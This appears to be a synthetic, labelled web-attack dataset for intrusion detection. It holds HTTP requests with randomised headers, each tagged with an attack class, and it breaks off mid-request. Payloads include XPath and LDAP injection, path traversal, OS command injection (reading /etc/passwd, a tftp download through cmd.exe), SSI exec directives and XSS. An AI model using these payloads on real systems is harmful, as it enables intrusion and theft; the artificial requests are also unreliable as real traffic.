If-Unmodified-Since: Fri, 13 Nov 09 11:51:37 CET
If-Match: "Al_M2p86uSFudm_HScc-"
If-None-Match: *
If-Range: Tue, 07 Mar 06 18:32:05 GMT
Max-Forwards: 8
MIME-Version: 7.9
Pragma: no-cache
Proxy-Authorization: Basic c3FvaWFyOmVjT1ZzNW4=
Authorization: Digest uri=http://sfdqq.ch/w4oi39b/rt6erG/aaebraw1/ioSfdss.swf
Range: 484-6716,4-82,-34
Referer: http://xltt.st/ysi2/ia00.doc
TE: chunked;q=0.4
Trailer: TE
User-Agent: Mozilla/9.0 (Windows; U; Win98 3.2; lf-7a; rv:3.4.4) Gecko/02368892
UA-CPU: x86
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 7624x8326
Via: 6.4 212.103.232.30, fir/7.4 www.8nyllt7r.png, 9.4 www.eocwyseg.shtml
Transfer-Encoding: cdeup1
Upgrade: ene/3.3, dnense/3.4, iDe8je/2.2, ecTeud/6.4, a7yhir/5.9
Warning: 707 233.213.218.176:22416 "2pjtanyoNbt" "Mon, 22 Mar 10 21:57:09 UTC"
X-Forwarded-For: 23.27.136.158
X-Serial-Number: 66520697255736682
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 44756
Start - Id: 50100
class: XPathInjection
PUT /EPclU/15numhsmwa4/etsoH2dp0telaaei/sfuyYNqr.jpg? HTTP/1.0
Content-Length: 81
Content-Language: csw,3a,lclt0oa
Content-Encoding: deflate
Content-Location: http://www.aorwgi.biz/ilgers/etbvoew/cSmow/hlnuci.cfm
Content-MD5: NnVsbGxtbnlyc2VQbm9zcg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 08 Jul 07 23:06:34 GMT
Last-Modified: Thu, 01 Sep 05 17:34:55 UTC
Host: www.aannnetlh.de
Connection: close
Accept: application/*;q=0.1
Accept-Charset: iso-2022-jp;q=0.9
Accept-Encoding: deflate, compress, gzip, identity, identity
Accept-Language: *;q=0.7
Cache-Control: no-cache
Client-ip: 190.90.78.212
Cookie: r4nulleZKVrROtelnet0=11824  or    1<    tiw4o/O/cmun/child::text()[position()=035] or   0899='] | /* | /foo[bar='
Cookie2: $Version="66"
Date: Thu, 16 Apr 09 19:49:00 GMT
ETag: W/"oVGxOXRSDXIVS2DmUS"
Expect: sneSier
From: sg4eHiz@plotai.gov
If-Modified-Since: Sat, 06 Mar 04 24:44:33 GMT
If-Unmodified-Since: Mon, 10 Jul 06 03:25:56 CET
If-Match: "C9xfgqJY1ux3VYbSm"
If-None-Match: "cjulccL3UjTfsfO-0VMG"
If-Range: Sun, 04 May 08 18:05:11 UTC
Max-Forwards: 172
MIME-Version: 6.4
Pragma: nlxyfg=n
Proxy-Authorization: NTLM aWRpc0hhbk9uZWRkcGllZXNpUmY1YWxrYW9pb2RNdGRzbXNvZUhjeWV0RHRlZUM=
Authorization: Basic eG1yZTp0NGV3d3Rw
Range: -5315
Referer: http://www.tRyuth5.it/EmustNwu/aMtmeh/iGlao/gAlt/Mnmfdaen.css
TE: chunked,trailers,trailers
Trailer: Accept-Encoding
User-Agent: Mozilla/9.2 (Machintosh; U; PPC Mac OS X 9.7; Nm-ee; rv:4.3.9) Gecko/89888152
UA-CPU: PowerPC
UA-Disp: 3524,226,16
UA-OS: FreeBSD
UA-Color: color32
Via: FTP/9.4 6.248.42.185
Transfer-Encoding: nq3si
Upgrade: tnneIh/3.3, sWf/3.2, dt7pet/7.2, mAzn/5.8
Warning: 994 www.udalaek.tiff:1441 "rt84iaaorGHcepor6cs" 
----: ------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

DPifsrhhiennt7=ddl>h9pa&sT=It&hFBnNYt@-DF=jsrew>weug:en o&dqchSbYt=4ede htE

End - Id: 50100
Start - Id: 38528
class: LdapInjection
GET /i-1Bh4LdeyNia.h4ghc/eU.dll?oaa4c=27&hP6rIrrspialsLe=%22%29%28targetfilter%3D%28o%3DNetscapeRoot%29%29 HTTP/1.1
Host: www.NhEoex.biz
Connection: keep-alive
Accept: text/plain, image/*, video/*;q=0.4
Accept-Charset: *;q=0.4
Accept-Encoding: 
Accept-Language: eomg-R, oae9-skl;q=0.2, Ht6-n3t, 5oe-od, 93tzehr-c;q=0.3
Cache-Control: max-stale
Client-ip: 232.98.249.169
Cookie: teeuospl=>e ;6w=~nl;e6cuneiesma=tz0VQVaZV;nefnt2eVuta=i.4uZZB
Cookie2: $Version="13"
Date: Sat, 29 Dec 07 01:16:56 UTC
ETag: W/"fAffeoKc6SLNsUm"
Expect: aieFs
From: n9eatae@mdeel.gov
If-Modified-Since: Thu, 14 Jun 07 13:58:16 GMT
If-Unmodified-Since: Mon, 18 Apr 05 07:39:35 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 4.8
Pragma: mse8ut='otErl'
Proxy-Authorization: NTLM Z2RpZWZmYTBGUG1yQWRpSUhuUnQ5SjNpbzNzSWxuZXJVYXRzdGlvZW1veGxJbGlh
Authorization: NTLM YmV3eWVkbGVkM2RvbFFzZW5td0RhYTNUQ3RkZWdzOG4=
Range: 548411-,-37195
Referer: /5ajsn/3t2ra/sxeu.php
TE: trailers
Trailer: If-Range
User-Agent: rI9yZ (ofvm-T; wB7Rvz2; nt8gCe; mxWctkc3Qq; 8WSZ5hD)
UA-CPU: MIPS
UA-Disp: 957,245,16
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 8726x4401
Via: 0.5 90.245.5.221, 0.7 www.tgemrgde.shtml, 7.3 67.175.35.119
Transfer-Encoding: deflate
Upgrade: piFi/9.7, A4e1/7.0, 7lsnih/3.7
Warning: 494 103.11.37.183 "1br62beg" 
X-Forwarded-For: 101.186.114.243
X-Serial-Number: 30599
----: ----------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

null

End - Id: 38528
Start - Id: 38376
class: LdapInjection
GET /PnAdnemeHLQs7adi1/rme/e3EGS_eN2xoO-j2/9IYstylexc3LIa/risvt6pmjLQFi9/wR5telnetBHU5T/i--1toxx/i4diasfwoe/sMmeg/htnJwgetzZd3mJSbla.sh?ItgPx6updateYTr=795%29%28%26%28objectClass%3Dhdnp%29%28%7C%28sn+%3D+jdsn%29%28cn%3D2+++J*%29%29&nR.9H=dmav7ist HTTP/1.1
Host: www.1lzaiE.it
Connection: He8di7eo
Accept: video/*, text/*, image/*
Accept-Charset: koi8-r, x-mac-turkish, x-mac-arabic
Accept-Encoding: compress, identity, identity
Accept-Language: nanaaanc-ottecbu, aEeto-lt4A, eifs-cfis1hT, aepua-weoTlder;q=0.6
Cache-Control: only-if-cached
Client-ip: 41.189.98.25
Cookie: soexcziimt=unqeobaR-nie5bh?stdinr;fx38=6ntmp;oeRr9egtt=tKecXKxE
Cookie2: $Version="9"
Date: Sun, 07 Jun 09 24:33:13 CET
ETag: "_tbcCy0@wz8M8jd"
Expect: 100-continue
From: frlm@ctsi1ez.ch
If-Modified-Since: Tue, 27 Jul 04 24:52:40 UTC
If-Unmodified-Since: Wed, 04 Nov 09 20:13:54 CET
If-Match: "x3Veeu-2SRCXR1YS"
If-None-Match: "VMlKZpg.b@p@Cc4P0hF"
If-Range: Thu, 25 Oct 07 02:09:59 CET
Max-Forwards: 889
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: Basic dGlkaVI6ZDllUnJhcg==
Authorization: Basic c2dsb2VzOmx0c2NCNHM=
Range: -0,582766-
Referer: /whhc4fat/mset0/o8nee33/ct4r/kkfnii.gif
TE: deflate;q=0.4,chunked;q=0.1,deflate
Trailer: Referer
User-Agent: Mozilla/0.2 (Windows; U; WinNT 4.6; nb-pt; rv:5.2.5) Gecko/85108635
UA-CPU: 68000
UA-Disp: 6597,6108,32
UA-OS: Win98
UA-Color: color16
UA-Pixels: 554x9666
Via: FTP/8.6 www.hvo5n.gif, baibtc/9.7 139.26.137.7
Transfer-Encoding: deflate
Upgrade: rysE/9.0, mt3/0.2, 84ag/2.9
Warning: 306 www.u4zhxszn.shtml "rahmw" 
X-Forwarded-For: 18.81.134.210
X-Serial-Number: 85165873223938
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38376
Start - Id: 45533
class: PathTransversal
GET /uAucG_n5fnpTenWa9Jz/d9ctAm6ciq1t/4w9lyth5UWe@fE.pl?msLios8m=jKvdm%40c&2prSFKYqaHlI=uoMhHTnbhxerol&oseneea=hlnne%25r%3Dytelnet%3C&Enc8@QBfrombgsoundUlikeq=TtpAy0is1stae&aoe7=t%3A%5C%5CWINNT%5C%5Cwin.ini&XUUxJXlkb=9210589468&ryen9locdtws=87 HTTP/1.0
Host: 172.241.50.246
Connection: ei1evoas
Accept: text/html;q=0.1, application/*, image/*
Accept-Charset: windows-1254
Accept-Encoding: *
Accept-Language: 8eorCyso-khnvyse;q=0.0, rbed8sn-maeaa;q=0.5, tiO1ed-c;q=0.6
Cache-Control: no-cache
Client-ip: 228.114.110.173
Cookie: sQ7DK0ke=69607322;u_if=0242135
Cookie2: $Version="04"
Date: Wed, 26 Apr 06 01:00:47 CET
ETag: "Ze@vy62aYSghPKIo"
Expect: ax8lncn
From: aFhd@iesknmut3c.net
If-Modified-Since: Sun, 23 Mar 08 07:51:40 GMT
If-Unmodified-Since: Sat, 22 Jan 05 05:09:12 GMT
If-Match: *
If-None-Match: *
If-Range: "NobdZfNtglYhDQNP"
Max-Forwards: 989
MIME-Version: 3.3
Pragma: w='cnSnp2lk'
Proxy-Authorization: NTLM YzVhaXRubjBlOG9vdDZtd21pa05oZm1udGFFRWlrdWxXbGlvaW0=
Authorization: Basic N2VvaGFyaVQ6MWlpZTZzbHQ=
Range: 903-3,3-4324,-8
Referer: /tdsn/TbAnnc/reYweceE/es9t/sz7a.doc
TE: trailers
Trailer: Accept
User-Agent: Mozilla/1.1 (X11; U; SunOS sun4u 2.2; r3-mn; rv:0.4.9) Gecko/47323069
UA-CPU: 68000
UA-Disp: 6548,353,8
UA-OS: Win98
UA-Color: color32
UA-Pixels: 589x0586
Via: tcA/9.6 www.tupnrf.jpg:908, FTP/0.8 www.aI4itiy.html
Transfer-Encoding: identity
Upgrade: vleih/1.8, zzq/8.8, etwstn/4.5, eseo/9.8, ilezr/6.6
Warning: 291 197.115.20.32 "ofotvtereustbtDpofo" 
X-Forwarded-For: 167.86.117.234
X-Serial-Number: 2215888867609
----: ------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 45533
Start - Id: 45556
class: PathTransversal
GET /e96VyxU3t@QXWh/eWO/soaTNd6gdvs/0@-h1TKVaj6JGT0-V/nZrWxEs1neei/it/fQI2.wDpYa7N.swf?c88-pSOf=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FInetpub%2Fiissamples%2Fnginisalde%2Frearngstro%2Flietriicel%2Fntor.php3&ulo1cEmulnmLmeh=-o%3Fgirf+ie&ewrdEueaca=null+t&veseort=evalnae24ru HTTP/1.1
Host: www.gsqrgdnld.gov
Connection: ohestne
Accept: */*
Accept-Charset: *
Accept-Encoding: 
Accept-Language: wkh-aO;q=0.7, Oshp-eoao, osgie-43;q=0.4
Cache-Control: no-cache
Client-ip: 225.212.174.38
Cookie: nori=tx8anAA
Cookie2: $Version="087"
Date: Sun, 11 Jan 04 09:22:20 GMT
ETag: W/"MCjDO_8o8xkGKH6Xu"
Expect: 100-continue
From: kccnlkv2@rodignu.de
If-Modified-Since: Sat, 10 Mar 07 12:14:12 CET
If-Unmodified-Since: Mon, 10 Aug 09 04:12:42 UTC
If-Match: "f9VHwgZRm03tTfOvB@u"
If-None-Match: "jU.2GjVTt18oi7Xj"
If-Range: Tue, 10 Nov 09 23:51:34 GMT
Max-Forwards: 6175
MIME-Version: 9.4
Pragma: ot8ok='l'
Proxy-Authorization: NTLM ZXBzeGFlbkxta3QwRGRkcnB5YXBtcTBGbmU4YXJuY2FpTjhkaGx0
Authorization: Digest response="E22F9eE11467e7b1deeE0c6f3c56A53a"
Range: -7305
Referer: http://dnslte.be/Heaayw/ttabaax/veiiwet/8Te9s/Dupjq.sh
TE: chunked;q=0.8,deflate;q=0.0,trailers
Trailer: If-Unmodified-Since
User-Agent: Mozilla/4.6 (compatible; Konqueror/0.8; Linux i386; k8f1aAt; iAaEaj)
UA-CPU: StrongARM
UA-Disp: 6548,353,8
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 220x9820
Via: 7.9 38.83.179.127, 9.1 www.qa2smm.tiff
Transfer-Encoding: deflate
Upgrade: tvtmyl/0.9, dEhai/7.5, oiv8C/9.2, beNr/8.8, c9orN/8.6
Warning: 278 227.248.46.198:699 "ihqt4i1" "Mon, 16 Jul 07 06:16:16 UTC"
X-Forwarded-For: 145.196.47.34
X-Serial-Number: 86157391207979195
----: -------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 45556
Start - Id: 36508
class: OsCommanding
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+tftp%20-i%2062.107.47.226%20GET%20cool.dll%20d:\httpodbc.dll HTTP/1.0
Host: www.ie6ndcBej.ch
Connection: grst
Accept: */*
Accept-Charset: *;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 138.104.69.2
Cookie: shbeh=eaani/I52nes~a;YMCeLcmd=lst@rtesconnectoitfre;outsuelcoh9=HnaRdH]yv;e]uecs6
Cookie2: $Version="048"
Date: Tue, 20 Jan 09 13:09:15 CET
ETag: W/"XSBTdwWVG7jW_uARV"
Expect: 100-continue
From: gshio@xxma.be
If-Modified-Since: Tue, 02 Aug 05 13:33:52 GMT
If-Unmodified-Since: Sat, 17 Jan 04 23:35:18 CET
If-Match: *
If-None-Match: "f0hZINOGhvietrIWvi"
If-Range: *
Max-Forwards: 5
MIME-Version: 8.3
Pragma: no-cache
Proxy-Authorization: 0eHre bae13=roeTol
Authorization: Basic dHJ1STpsU2JicmV4
Range: 560-980083,973913-
Referer: http://www.KrEwted.st/etteduo/lntt.shtml
TE: trailers,deflate,deflate;q=0.4
Trailer: From
User-Agent: 9xT_dAjdeR http://www.rtle.com
UA-CPU: 68000
UA-Disp: 0316,285,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 9877x8489
Via: HTTP/6.6 www.mi6n6.jpg, HTTP/4.1 129.14.130.80
Transfer-Encoding: compress
Upgrade: 0evvr/2.8, nciwf/9.2, ont/1.4, srn/0.0
Warning: 602 79.223.148.171 "fredebwlteNerqnIji" 
X-Forwarded-For: 29.11.215.219
X-Serial-Number: 5785430371432590
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~

null

End - Id: 36508
Start - Id: 43196
class: OsCommanding
GET /rW4RO2RUd/eehofdfr/Sallp2nY.boot.iniqxL/dtsm94qEywvpCrOio/hL_w9e/e3fTVr47Z/iIfSjapR-dA50TjB/sJRf-Y2Kz-.htm?anonippmn8nardc=%7C++cat+%2Fetc%2Fpasswd&P6=kkP%3D HTTP/1.1
Host: www.hnunr.net
Connection: okiwz
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: *
Accept-Language: *;q=0.9
Cache-Control: max-age=8873
Client-ip: 157.236.28.151
Cookie: tTroethit=o Sac;gusrv4CafKx2=356;z8tboot.inimrMtJHbH=$tmp5;afnothiiqotel=ncqi5
Cookie2: $Version="9"
Date: Sun, 15 Mar 09 09:00:09 GMT
ETag: W/"ZrsNZ8DCH0PWd7.VuP.4"
Expect: 100-continue
From: caRsu@eRisrtRCa8.st
If-Modified-Since: Thu, 18 Oct 07 15:20:57 GMT
If-Unmodified-Since: Fri, 09 Mar 07 01:37:16 GMT
If-Match: *
If-None-Match: "ku6UmabwYWQ0sbk2r6"
If-Range: "Q2BvX0v6uWXqZ5uX"
Max-Forwards: 4
MIME-Version: 9.7
Pragma: no-cache
Proxy-Authorization: neeoh eyo1ad=huxteEf
Authorization: Digest nonce
Range: -40670,4905-
Referer: http://gguesxzt.uk/hes5er9.cfm
TE: gzip
Trailer: Authorization
User-Agent: ttjzuar9lDtartieah5
UA-CPU: 68000
UA-Disp: 1503,1276,8
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 953x846
Via: 6.7 252.91.102.202, ofrilg/3.9 www.yoie.jpeg, 1.3 52.153.17.72
Transfer-Encoding: gzip
Upgrade: hi11/1.2
Warning: 407 143.65.197.47 "assaq" 
X-Forwarded-For: 64.137.223.100
X-Serial-Number: 3512760212193
----: -------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43196
Start - Id: 40093
class: SSI
GET /aN/6N.html?ueteed=trQVDZT&DuLddrszeeqtx=sshrhlswilv5am&neqritnndd=miogscript9irb&EhetUleysel=%3C%21+++%23%3C%21--++++%23exec+++cmd%3D%22id%22--%3E&P_s-vd.servicesP=8aTfr5e&3updateg6=qibinhqs0&rtkfl1bleth6o=6683&gmbobjectdD=61673709&E9to=hueSnd&hdhsO1lwOt=Rtsee%3FsOttnnull HTTP/1.0
Host: www.8m4imo.ch
Connection: close
Accept: */*
Accept-Charset: windows-1257;q=0.8, iso-8859-6;q=0.3
Accept-Encoding: *;q=0.7
Accept-Language: 9kaaoes-cislignr, noe-0on6;q=0.3
Cache-Control: no-transform
Client-ip: 221.230.41.62
Cookie: iitohdixt=netcatphpjs sodt(rgiH?i;oeyetrlJmyog=rD;sEus4=rmd6uyneeeujo;tsadr=o6;jk4vjot0r=8
Cookie2: $Version="585"
Date: Sat, 27 Sep 08 19:31:40 GMT
ETag: "SadNG8P.EPu@j4T"
Expect: tslD=cua4;iiit=tpIAwosc
From: eolu8j@aioa.fr
If-Modified-Since: Sun, 05 Jul 09 12:39:32 UTC
If-Unmodified-Since: Sun, 11 Jul 04 23:17:30 CET
If-Match: *
If-None-Match: "CPj4MReygrS5Cjpl4"
If-Range: Wed, 17 Sep 08 10:43:19 UTC
Max-Forwards: 199
MIME-Version: 2.8
Pragma: no-cache
Proxy-Authorization: mshe trCer=de1seo
Authorization: eke5at o9mi=ikHts9eh
Range: 1646-745
Referer: http://Flkap9rr.st/taaw.txt
TE: deflate;q=0.8,chunked;q=0.3
Trailer: Host
User-Agent: Mozilla/1.6 (X11; U; Linux i586 7.8; s4-kH; rv:0.3.5) Gecko/20090378
UA-CPU: MIPS
UA-Disp: 952,4343,8
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 0944x596
Via: HTTP/9.4 232.225.23.220, 4.5 156.113.93.118:2288, 6.6 www.gutnrU.tiff:0
Transfer-Encoding: identity
Upgrade: uts3/8.2, hd4uvh/2.4, a6sol/2.3, yce/9.7, cnsH/1.9
Warning: 972 46.77.187.29 "samietonOs6ar8c" 
X-Forwarded-For: 64.201.70.142
X-Serial-Number: 606454137105
----: ----------------------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 40093
Start - Id: 43105
class: OsCommanding
GET /VqdTxK@A/ey.87qDm0h1YTbEjWtMC/didtm/ajhffaOngamrehaeTd/dEbt1iyTN-iLOze3oRb.php3?idmkei6oEU0tpg=%2By%40d+Ol&egsnkteimwig=sstfhogfeEnyae5ah&8erigtebaEotlo=r4cA4vA&yyre2tjEhetepAx=2msmieA&DU2vsTOs=0&cife=kkntsoshmaeltot&sskc=utC+e4+re8i&cEYhetet=51019&zH7ZG=uim5o&eBeRAshutdownm=pflnRi3sn2rlbsdhp&.b3_CWOTvxm2=%5C%22+%5C%3B+++%5C%2Fusr%5C%2Fbin%5C%2Ftelnet++www.liniictati.com++88+++++%3B&ai9te=B&AuwhHarxaonm=aC%40DcOC4HyMc&ahPzeyt=ik HTTP/1.0
Host: www.anTtie.org
Connection: keep-alive
Accept: video/*;q=0.8, application/*;q=0.3
Accept-Charset: hz-gb-2312;q=0.6, iso-8859-7;q=0.8, x-mac-turkish;q=0.8
Accept-Encoding: gzip;q=0.7, compress, identity;q=0.8, compress, identity
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 98.175.194.206
Cookie: oey3efl9rrsN=201
Cookie2: $Version="389"
Date: Wed, 13 May 09 02:40:40 CET
ETag: "_4qjG6.03WCUTMpx"
Expect: 100-continue
From: roneeua@1gSEvrlu.org
If-Modified-Since: Sat, 21 Mar 09 04:23:17 UTC
If-Unmodified-Since: Sun, 06 May 07 02:02:34 GMT
If-Match: *
If-None-Match: *
If-Range: "HL4rjtEB9D0isHuw"
Max-Forwards: 220
MIME-Version: 6.4
Pragma: no-cache
Proxy-Authorization: Jwosfs mnR2=s6nera
Authorization: Digest uri=/T1ebtt.php
Referer: /EalaEs/4h6tuMtl/zgq3erhX/mcpidc/Ainlurwo.fgf
TE: deflate;q=0.4,deflate,deflate;q=0.8
Trailer: Date
User-Agent: teUO (nYjUobyW.; hw3JJ6Q)
UA-CPU: 68000
UA-Disp: 046,4473,8
UA-OS: Solaris
UA-Pixels: 2923x7442
Via: HTTP/2.8 87.137.87.75, FTP/8.1 182.211.9.179
Transfer-Encoding: gzip
Upgrade: gowla/8.8, 8aooI/3.3, Tkiyol/1.8
Warning: 117 www.nI2s.jpeg "duaiiS2" 
X-Forwarded-For: 204.73.145.24
X-Serial-Number: 306986025864028
----: --------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 43105
Start - Id: 39162
class: SSI
GET /k7rIUbLlobjectQDJ/24j/arreviela6hcsstaee/s7ivsrwsesnaqo/hZhobtGaene5lheue3/eerexmo/etmicoLras/aYnN/h09glSUpljHbeb6zg.shtml?33AsesothyI=lss&sei=2646753&94UncBk_=toespg&bErUieuuRn=formnh%3Dy&di=R8Xuf&tsse=d2&.window.openVBVTN9iNj=o9j45eJ&ennsiuGde=chyoJDQ HTTP/1.0
Host: 34.102.3.159
Connection: close
Accept: */*
Accept-Charset: *;q=0.9
Accept-Encoding: 
Accept-Language: i4akt-wtqbhlw, fgl-U0b;q=0.6, sa65l-Dt, qiT0l-mn4t;q=0.7
Cache-Control: min-fresh=1892
Client-ip: 166.92.42.66
Cookie: aier42et=7ea1M9n5D;ctst13=037537326;tae=<!--#email fromhost="www.SEs1emkf.com" tohost="mailbox.yamn.com" message="bfns ohv7uug dtnaeomS gtey" fromaddress="sdehte.com" toaddress="qHrIy.2ieDuT.com" subject="crt" sender="reg.com" replyto="veuoi.com" cc="es" inreplyto="ymo dut wt" id="aykmail" -->
Cookie2: $Version="34"
Date: Sat, 17 Jan 04 19:00:20 CET
ETag: "H@fBpxTD@WpGAkw"
From: bjtwmfi8@qnsa.be
If-Modified-Since: Mon, 02 Mar 09 04:28:56 GMT
If-Unmodified-Since: Mon, 23 Nov 09 24:49:02 CET
If-Match: *
If-None-Match: *
Max-Forwards: 385
Pragma: no-cache
Authorization: NTLM Tnpycms4YXRtYTdoaW9qbkVhcmFtcnRkc3ppbGd0c2VJc2N1YWw=
Referer: http://www.stfnRw.cz/raTXt/frIgirLa/tutwk/lsE6eo.dll
TE: trailers
User-Agent: ndltae (h9uvujPCcO; guMdtN8R_)
UA-Pixels: 983x7791
Via: HTTP/0.2 www.octsC1t.shtml
Transfer-Encoding: qeertl
Warning: 861 www.usjt.css:2053 "Ptob3tjhlooTner" 
X-Serial-Number: 9213674294
----: -------------

null

End - Id: 39162
Start - Id: 48504
class: XPathInjection
PUT /hNiqbx/waeZgEapl9/oloiudMai/h@FlcsEsT.VcI..6/zq0AlIvgDVWKfM79cdD3/jBAZh_wj/h2S.0pb@nK2bF8G/tiOr__ohOMlwlwvuEEnx.nsf? HTTP/1.0
Content-Length: 407
Content-Language: bEiabmr,mtmllsIs,1dsa
Content-Encoding: identity
Content-Location: http://www.Uaog.uk/n6qudibx.tiff
Content-MD5: dXQ5cmlvc29lRGFjbnNQMw==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 16 Jun 06 24:22:13 GMT
Last-Modified: Tue, 24 Nov 09 24:07:14 CET
Host: 176.216.217.102
Connection: keep-alive
Accept: video/*
Accept-Charset: iso-8859-9;q=0.7, windows-874, cp-950
Accept-Encoding: 
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 186.162.234.129
Cookie: uytsnaeasiulot=nane9ripm0o
Cookie2: $Version="04"
Date: Fri, 06 Jun 08 16:28:17 CET
ETag: W/"Z8k6MID8rdOhM91kgfF"
Expect: osOsoea
From: aylyre@iNsirre.it
If-Modified-Since: Fri, 01 May 09 12:08:42 GMT
If-Unmodified-Since: Mon, 02 Jul 07 23:15:02 UTC
If-Match: *
If-None-Match: *
If-Range: Fri, 26 Aug 05 07:49:20 UTC
Max-Forwards: 556
MIME-Version: 1.8
Pragma: no-cache
Authorization: NTLM ZW5hZmVlbm9yYU9mbXNuZ256M1llZTRvSml6dG9GcjZpcHh0c2VDb3l0bg==
Referer: /iraees.dll
TE: deflate,trailers
Trailer: Pragma
User-Agent: Mozilla/2.5 (X11; U; SunOS sun4u 2.5; ec-l4; rv:8.7.8) Gecko/32861080
Via: eae/2.8 www.0p9a.htm, HTTP/5.6 37.124.9.63
Transfer-Encoding: compress
X-Forwarded-For: 104.189.251.216
X-Serial-Number: 01871
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~

natIipa6t=93539&yotiutaltneel=toae' or   count(  path/child::node()[position()=(( i + j   +k  + l+  1)]    |    path/child::*()[position()=(k+1)])=1     or    'dsipetwo'  = '  eanogcn'  or&hmfntlt=047309&admin3isaGa=[-btionqee&dht9t=metaer toe&1is=5&fqou=eubjHtItwcrhIhap&hm9uo=t.2CnMO&eceuhctocltaeo=2&uwdf5tcnd3hzef=veof]

End - Id: 48504
Start - Id: 46982
class: XSS
GET /rjmEknllt/tdMoo/oaleeeifnhmitrhikno/Tieeh8i10i5yeTesn/tMF3PdwiOGRg/1vue/eh59rneke2mu.cgi?lkdmxa6neeoR=l7O.DqVdo&eaO4seeBntnhaet=%3Cimg+++++src++++%3D++%22+++mocha%3A%5Balert+%28%27l9Lh%27%29%3B%5D+++%22+%3E HTTP/1.0
Host: www.rtnzriaeo.com:82
Connection: close
Accept: text/html
Accept-Charset: *;q=0.6
Accept-Encoding: 
Accept-Language: e-eaeea, sbstc-Vlnoqs, tu6qu-x, ahs-81fuoA
Cache-Control: max-age=7803
Client-ip: 128.77.209.28
Cookie: kSagioulsfle=erKHtdvyI
Cookie2: $Version="85"
Date: Tue, 14 Sep 04 07:21:39 GMT
ETag: W/"Buq@whtrMtHZH-Bk7Zb"
Expect: 100-continue
From: wj0oee@a4ld5r2exe.uk
If-Modified-Since: Mon, 15 Feb 10 20:21:50 UTC
If-Unmodified-Since: Mon, 22 Mar 10 03:24:30 CET
If-Match: *
If-None-Match: *
If-Range: "w6J_AGL-poMHck9z3z"
Max-Forwards: 451
MIME-Version: 8.6
Pragma: no-cache
Proxy-Authorization: Digest realm
Authorization: NTLM cnRkc2xvb3dwZHJqNXJlb3RlczJvd3BvdGRzbm5ncHZhc1RhdWFm
Range: 5-22964
Referer: http://zWhn.net/dunnTtec/Qart7Mo.mp3
TE: deflate,trailers
User-Agent: sOAiieet/4.6.3.2
UA-Disp: 2976,173,32
UA-Color: color8
UA-Pixels: 199x2885
Via: HTTP/3.6 www.hYbvu.tiff, sel/7.6 159.246.100.101
Transfer-Encoding: gzip
Upgrade: 4il/0.7, 4aTrnW/6.9, 7fuM/5.0, sih/2.0
Warning: 973 www.oeahty.js "metfxElbimtcoqd5lot" 
X-Forwarded-For: 153.150.34.190
X-Serial-Number: 09560109
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46982
Start - Id: 48231
class: XSS
PUT /FJk8T4mosXE/h9dse7Cdtageoe/07/sSaheut/oyscv9xji2xSiQ/otpi0vnuy/-9VgmetaRy0SsystemZX40.nsf? HTTP/1.1
Content-Length: 126
Content-Language: Tiy9ec,6bwti
Content-Encoding: compress
Content-Location: /lsrko/6inehdhs/uSsoyb.php4
Content-MD5: NzZsNXFpaG9FaXA4c2NpYQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 26 Mar 07 16:38:32 CET
Last-Modified: Wed, 07 May 08 11:59:07 GMT
Host: 238.1.85.227
Connection: close
Accept: image/*;q=0.5, video/mpeg;q=0.8, application/x-tar
Accept-Charset: cp-936;q=0.9, windows-1251;q=0.5, iso-8859-4, iso-2022-kr, x-mac-arabic
Accept-Encoding: identity
Accept-Language: *
Cache-Control: no-store
Client-ip: 144.238.162.182
Cookie: tmgiepelljArf=<body  onload =   "     [alert  ('a8rniooi');]     "  >
Cookie2: $Version="830"
Date: Fri, 12 Sep 08 09:25:17 UTC
ETag: W/"K1TQ--K12uVKwS1AQ"
Expect: edjep=watar;Oneanh
From: rgCEe@mks1ccnon.com
If-Modified-Since: Tue, 27 Mar 07 11:48:25 GMT
If-Unmodified-Since: Thu, 28 Jul 05 17:16:58 UTC
If-Match: *
If-None-Match: "icVR6vxJFLBZI6U"
If-Range: Thu, 08 Apr 04 11:03:37 UTC
Max-Forwards: 1
MIME-Version: 7.2
Pragma: tot='gso6daup'
Proxy-Authorization: o9ieam tglf6r=lilay
Authorization: sjsn teieowan=ytLnr
Range: 2-22075
Referer: http://www.umhmiuce.net/ifnhA2n/sieN.jsp
TE: trailers,chunked;q=0.8
Trailer: TE
User-Agent: Mozilla/4.7 (X11; U; Linux i586 6.7; dw-ec; rv:9.6.9) Gecko/58940931
UA-CPU: StrongARM
UA-Color: color32
UA-Pixels: 467x7799
Via: 9.5 59.44.235.74:86405
Transfer-Encoding: deflate
